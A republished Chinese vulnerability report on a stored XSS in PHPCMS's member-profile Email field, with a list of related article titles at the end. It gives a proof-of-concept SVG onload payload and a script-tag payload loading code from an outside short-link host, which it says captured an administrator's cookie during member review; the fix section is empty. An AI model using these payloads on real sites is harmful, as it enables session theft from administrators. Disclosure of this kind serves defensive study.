phpcms某处储存型XSS(demo+本地演示)

Posted

tags:

篇首语:本文由小常识网(cha138.com)小编为大家整理,主要介绍了phpcms某处储存型XSS(demo+本地演示)相关的知识,希望对你有一定的参考价值。

详细说明:

demo+本地演示



存在XSS的地方在商务中心的商家资料的我的资料的Email那里(这句话好绕口。。),属于过滤不严格随便插字符的问题,我直接在Email那里写上"/><svg onload=alert(/1/)>可以看到是正确的

技术分享



然后点击提交可以看到说操作成功

技术分享



然后来到我们的企业首页查看可以看到成功弹窗

技术分享

? ?

技术分享



再查看下源代码,可以看到是储存型的

技术分享



本来想去后台查看的,但是无奈demo不提供后台演示,只好本地搭建看看了,本地搭建好了以后来到后台查看是不能直接打后台的,但是管理员审核会员的时候会到会员的企业查看,这个时候可以看到成功弹窗

技术分享

? ?

技术分享



然后继续构造:"/><script src=http://t.cn/Rz4Oi2b></script>,提交后看看能不能打cookie

技术分享



可以看到已经成功打到cookie~

技术分享

漏洞证明:

技术分享

修复方案:

以上是关于phpcms某处储存型XSS(demo+本地演示)的主要内容,如果未能解决你的问题,请参考以下文章

pikachu学习——XSS漏洞3种基本类型

webug4.0储存型xss-10

存储型XSS与反射型XSS有啥区别?

资讯14亿用户账号密码被泄露,银行支付宝比特币全中枪;WordPress 储存型 XSS 漏洞

如何为开发人员演示DOM型XSS漏洞利用过程

PHPCMS某处设计缺陷可致authkey泄露